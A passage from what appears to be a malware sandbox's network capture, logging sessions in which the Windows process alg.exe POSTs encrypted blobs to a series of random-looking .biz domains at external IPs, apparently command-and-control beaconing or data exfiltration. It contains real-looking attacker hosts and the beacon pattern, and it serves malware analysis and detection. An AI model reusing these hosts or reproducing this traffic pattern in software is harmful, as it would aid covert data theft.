                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.920604944 CET778OUTData Raw: 84 a0 8a c2 26 02 c6 23 fe 02 00 00 b5 1c bd 92 1c 50 44 2b bb f0 f8 47 c0 e6 f7 ee 20 50 af 96 4d 9b 4e be 38 56 62 ad 0f a4 95 2c 85 16 fd 45 35 e1 5a ba b9 03 ac 79 6d 9d 65 bc ef 2c 0e b3 16 c0 10 7c d2 83 8d 8a 6b 4c f6 73 8d 85 00 9a 5b dc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &#PD+G PMN8Vb,E5Zyme,|kLs[WMjn(H6"y&xg_DJFtWd"HxHcp?UEL|KnvK$9?WvO!X6yF~P8VK5ZfI)cFQ~Sv*L@
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.761270046 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3a4f0303823c69251ccc02a697680a3f|155.94.241.188|1730129872|1730129872|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        32192.168.2.449768208.100.26.245806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966738939 CET345OUTPOST /mi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:52.966738939 CET778OUTData Raw: 2a 54 92 d2 95 73 57 65 fe 02 00 00 31 9a 17 01 7e 93 c0 2b 6c 00 a2 b1 b2 4b 1d 4f d5 ac ae 67 d4 91 67 e5 da cd 25 2e f5 1f 5e b1 a0 a2 de d0 e2 e8 a3 72 29 3a aa 71 2c 2e d7 69 2f 15 4a ad 0e d4 ab 37 b1 9d da e6 67 76 f1 b6 f4 7d cf 9d a7 8d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *TsWe1~+lKOgg%.^r):q,.i/J7gv} u)$-.XhP5+*=>(D|.0$h$3H-~zOX4h*QZm3QB~5}vzx&`SMH(>0qKG1YY3<Fru+g_M/[/X
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.653592110 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.696023941 CET351OUTPOST /nmaggyam HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.696077108 CET778OUTData Raw: 87 07 80 db 67 1f 52 59 fe 02 00 00 35 9f 99 2c ba ca cf f1 3a da a3 cd 97 31 67 c5 7b 6d 17 f0 cf ce 62 cc b6 0d 1a 84 8e 00 2b fb 42 0a 3c 9f ef cf 77 89 01 e2 dd c6 6b 88 5d 33 ab 8c 79 ed b8 3a 54 ac cd 18 7b 22 28 8e c8 d6 e7 32 10 15 7e 6a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gRY5,:1g{mb+B<wk]3y:T{"(2~jXXwm]kOxn7AN~9U<m1(v5fTZj~FH``GPU#A4pTgyOIQG4l`u\A:fBDiH-PIiA
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:53.844095945 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        33192.168.2.44976934.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126360893 CET351OUTPOST /cmntnmriuw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:54.126410007 CET778OUTData Raw: 35 81 d6 98 c5 d1 21 46 fe 02 00 00 ac 4d 38 4c 40 f7 37 f4 97 5b a1 8b 0e ef f2 68 92 c4 3d 56 4d bc dd ae 38 9f 1b 5a 47 10 c7 b7 e4 b3 96 64 2b 0a f1 65 ed a7 db 44 39 db e9 de b3 41 3e 0c 91 f7 c4 4c b4 41 46 62 8e c4 8d 8b 33 ed 6d 1d 12 0f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5!FM8L@7[h=VM8ZGd+eD9A>LAFb3mD^,dXZ{6JmUu0lzfKZ?RaQrSY0If\T*+"qYeg+#gjt`rgbRR}Kq/Z%sX4$+zvQPN&
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.174616098 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9b5754bad3bc5ec87dbfd36291225ec3|155.94.241.188|1730129874|1730129874|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        34192.168.2.44977054.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391169071 CET358OUTPOST /mrsvwgseskwgtc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:55.391195059 CET778OUTData Raw: eb 92 e9 f2 db 81 1d 8f fe 02 00 00 ee b8 38 63 cc c5 cd c2 ed 0f 05 f0 a1 1b d9 15 44 1e 0b c7 1b f1 9f 0a 51 35 3b f3 f4 b3 7d 16 2e 16 9b 32 2b 47 4f 55 5b 62 7a 5e 92 70 fb 89 38 cc ff e0 73 03 14 8d 54 a9 2c 8a f3 5a 4f f3 f9 de b0 6a 1e e1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8cDQ5;}.2+GOU[bz^p8sT,ZOjK\;]uHjVw;U4~x[eUgt.Z]]%<!v&1-=Uo'.A2F,,qE*qRE]etD
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.247502089 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5fed0a207cdd008f8bcb1cb0f0b88ce4|155.94.241.188|1730129876|1730129876|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        35192.168.2.44977118.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448688030 CET353OUTPOST /pyamvnfeng HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:56.448709965 CET778OUTData Raw: 5d 80 6f 0e a1 86 27 c5 fe 02 00 00 e8 47 b2 94 5f 6b fc 26 a2 60 0e 7d 12 a2 0e 76 1d cd da cc ee 74 22 c3 94 31 64 f0 07 dc 55 e3 2d 9a 1a ec 8f d3 02 15 7a c8 b7 cf 87 05 27 88 53 b7 d6 21 8b 99 7c f2 b1 ea f7 ae 85 92 b5 e7 f4 69 bf 28 37 ca
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]o'G_k&`}vt"1dU-z'S!|i(7%rQW@9fVI@`hi+1|#EL|5R-o;5;XD7OZi)vc#VHV,}2M}Y7~G+{g~hv-Sf.
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:57.995876074 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=94b1bc99141302e5423eb570df2323f0|155.94.241.188|1730129877|1730129877|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        36192.168.2.44977218.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293490887 CET349OUTPOST /txmgarlp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.293512106 CET778OUTData Raw: 94 95 e5 e6 44 7b 8e 1f fe 02 00 00 f5 c9 8b 43 da 4d 06 a8 85 69 00 7c 28 fc 49 37 fd 66 73 1f 58 a4 3b ae 3a ce bf 9c 3a 3e 04 b9 d7 3d c8 f6 9e fe 72 62 65 3f d2 45 26 33 84 97 e0 1d f8 85 95 76 65 8d 42 ed a1 4a dc 63 02 94 fd 68 a1 93 2f 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D{CMi|(I7fsX;::>=rbe?E&3veBJch/a}@O~~Il^,evA1e%h>EJ7W]Vh?^pwS)+h0s"/g2Y08\>rR`tIrpy!+ktA|oQ;
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:58.948283911 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c82b461f42a90aaea15b6e9c5f9501de|155.94.241.188|1730129878|1730129878|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        37192.168.2.44977444.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168756008 CET356OUTPOST /vbtgsklxqvsc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.168903112 CET778OUTData Raw: 09 b4 71 6c 99 a7 f1 24 fe 02 00 00 1b e6 03 9c 4a 2b 5a 28 90 4c 24 e1 ab 9a 67 f5 e0 3c a4 86 da bb fc 10 33 0d 6d 0e 4c af 2e 7e 19 02 dc ab ed 48 d7 0f 52 77 35 de 9e 63 14 e8 08 41 87 8c c8 26 01 01 4d 81 56 43 48 f0 2b 54 33 42 2f e2 48 06
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ql$J+Z(L$g<3mL.~HRw5cA&MVCH+T3B/HKDJtt8s^{){>V3j*P*E(ad,|JxKQ/7b!rkMb6qx_Z uS*B3DZ]MD#U-`|/(%-"-F
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:59.839534998 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:37:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d4950c314619ea9566fdd489b1c6b567|155.94.241.188|1730129879|1730129879|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        38192.168.2.44977618.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192723036 CET345OUTPOST /i HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:00.192749977 CET778OUTData Raw: 46 dc 74 92 b6 40 74 4e fe 02 00 00 c2 2e 53 50 79 bc 88 e9 86 c5 53 0b 90 39 60 6b 1c c9 d3 37 93 21 fa d4 1a 15 42 a2 e9 07 6b be 3c f6 89 8e 7d 24 d6 d0 e4 37 1f 74 2a 0d 45 60 f8 5d af 5e c4 87 7f 12 4e 9a 84 53 4f 6c 56 e3 f6 cc 89 12 3b fb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Ft@tN.SPyS9`k7!Bk<}$7t*E`]^NSOlV;p+M.f`#X$^|[G(gFWWG!9$5.ldui^pVPfK]!X7^9eU`KL*Vp0Nh;wy<>u]kk'k.OR;
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.661093950 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7ab49bacca005f079c416fac475c4be1|155.94.241.188|1730129881|1730129881|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        39192.168.2.44978718.246.231.120806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:01.879339933 CET356OUTPOST /ckhsjhaxaevpxtd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
